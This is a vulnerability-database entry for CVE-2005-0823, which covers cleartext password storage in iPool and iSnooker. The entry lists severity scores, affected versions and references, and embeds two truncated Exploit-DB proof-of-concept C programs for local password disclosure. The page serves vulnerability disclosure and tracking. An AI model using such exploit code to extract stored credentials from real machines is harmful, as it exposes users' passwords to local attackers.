CVE-2005-0823
published 2005-05-02CVE-2005-0823: ThePoolClub (1) iPool and (2) iSnooker 1.6.81 and earlier stores usernames and passwords in cleartext in the MyDetails.txt file, which allows local users to…
PriorityP418medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.06%
60.3th percentile
ThePoolClub (1) iPool and (2) iSnooker 1.6.81 and earlier stores usernames and passwords in cleartext in the MyDetails.txt file, which allows local users to gain privileges.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thepoolclub | ipool | <= 1.6.81 | — |
| thepoolclub | isnooker | <= 1.6.8 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
iPool 1.6.81 - Local Password Disclosure
exploitdb·2005-03-16
CVE-2005-0823 iPool 1.6.81 - Local Password Disclosure
iPool 1.6.81 - Local Password Disclosure
---
/*****************************************************************
iPool
#include
#include
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured. Can't get password!\n");
return -1;
}
RegCloseKey(hKey);
}
else
{
printf("An error occured. Can't get password!\n");
return -1;
}
printf("\n\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaC
Exploit-DB
iSnooker 1.6.8 - Local Password Disclosure
exploitdb·2005-03-16
CVE-2005-0823 iSnooker 1.6.8 - Local Password Disclosure
iSnooker 1.6.8 - Local Password Disclosure
---
/*****************************************************************
iSnooker
#include
#include
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured. Can't get password!\n");
return -1;
}
RegCloseKey(hKey);
}
else
{
printf("An error occured. Can't get password!\n");
return -1;
}
printf("\n\niSnooker 1.6.8 Local Password Disclosure Exploit by Kozan\n");
printf("Credits t
No writeups or analysis indexed.
http://secunia.com/advisories/14629http://securitytracker.com/id?1013458http://securitytracker.com/id?1013459http://www.securityfocus.com/bid/12830https://exchange.xforce.ibmcloud.com/vulnerabilities/19717https://exchange.xforce.ibmcloud.com/vulnerabilities/19718http://secunia.com/advisories/14629http://securitytracker.com/id?1013458http://securitytracker.com/id?1013459http://www.securityfocus.com/bid/12830https://exchange.xforce.ibmcloud.com/vulnerabilities/19717https://exchange.xforce.ibmcloud.com/vulnerabilities/19718
2005-05-02
Published